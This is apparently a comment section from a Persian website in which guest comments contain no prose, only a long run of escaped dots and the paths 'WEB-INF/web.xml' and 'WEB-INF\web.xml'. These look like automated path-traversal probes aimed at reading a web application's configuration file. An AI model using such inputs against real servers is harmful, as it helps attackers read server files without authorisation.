\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\

مهمان 24 مهر 1396 - 09:52

WEB-INF/web.xml

مهمان 24 مهر 1396 - 09:52

WEB-INF\web.xml

ارسال نظر